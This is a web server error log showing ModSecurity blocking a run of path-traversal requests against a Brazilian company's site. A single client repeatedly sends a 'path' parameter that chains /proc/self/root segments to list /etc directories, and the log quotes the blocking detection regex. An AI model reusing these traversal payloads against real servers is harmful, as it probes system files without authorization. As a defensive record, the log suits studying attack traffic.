[Tue Mar 17 14:28:50.182505 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.241.31:46802] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPUgeiSKl8TjouI-YbMQAAA8s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:28:51.586438 2026] [:error] [pid 29151:tid 140411540502272] [client 74.7.241.31:46808] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPU_PqhzTj3BvfDX-JjAAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:28:53.066038 2026] [:error] [pid 2598:tid 140411624429312] [client 74.7.241.31:46824] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPVRj0p0SRWAqcjGF7HAAAAw4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:00.134895 2026] [proxy_fcgi:error] [pid 7437:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:35944] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:29:01.427239 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:49704] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPXdY0UrI5A3LftIz9pgAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:03.164029 2026] [:error] [pid 2598:tid 140411616036608] [client 74.7.241.31:49708] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPXxj0p0SRWAqcjGF7HwAAAw8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:04.670885 2026] [:error] [pid 29151:tid 140411699963648] [client 74.7.241.31:49720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPYPPqhzTj3BvfDX-JkgAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:06.110167 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.241.31:49728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPYtY0UrI5A3LftIz9qAAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:07.554685 2026] [:error] [pid 18380:tid 140411607643904] [client 74.7.241.31:50762] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPY64xEDsg_V3ESNZODQAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:08.992746 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:50776] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPZNY0UrI5A3LftIz9qgAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:10.374183 2026] [:error] [pid 9299:tid 140411733534464] [client 74.7.241.31:50780] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPZr-sgTmmJoPuMdy3-AAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:11.806359 2026] [:error] [pid 9299:tid 140411616036608] [client 74.7.241.31:50784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPZ7-sgTmmJoPuMdy3-QAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:12.022815 2026] [:error] [pid 9299:tid 140411708356352] [client 74.7.241.31:50784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPaL-sgTmmJoPuMdy3-wAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:12.552376 2026] [:error] [pid 9299:tid 140411658000128] [client 74.7.241.31:50784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPaL-sgTmmJoPuMdy3_gAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:14.303116 2026] [:error] [pid 18380:tid 140411540502272] [client 74.7.241.31:50794] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPaq4xEDsg_V3ESNZOEQAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:15.832176 2026] [:error] [pid 7004:tid 140411741927168] [client 74.7.241.31:50810] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPa8U6Sx0TG1YjmQiwcQAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:22.129778 2026] [proxy_fcgi:error] [pid 28879:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:36422] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:29:23.544242 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.241.31:37226] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPc9Y0UrI5A3LftIz9rAAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:24.933911 2026] [:error] [pid 7004:tid 140411590858496] [client 74.7.241.31:37242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPdMU6Sx0TG1YjmQiwcgAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:26.350740 2026] [:error] [pid 18380:tid 140411733534464] [client 74.7.241.31:37246] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPdq4xEDsg_V3ESNZOFgAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:27.855911 2026] [:error] [pid 2598:tid 140411691570944] [client 74.7.241.31:59112] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPdxj0p0SRWAqcjGF7JwAAAwY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:29.321055 2026] [:error] [pid 29151:tid 140411590858496] [client 74.7.241.31:59118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPefPqhzTj3BvfDX-JmgAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:30.802034 2026] [:error] [pid 17965:tid 140411616036608] [client 74.7.241.31:59132] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPeqt8Nd0UC_OcbVHMgAAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
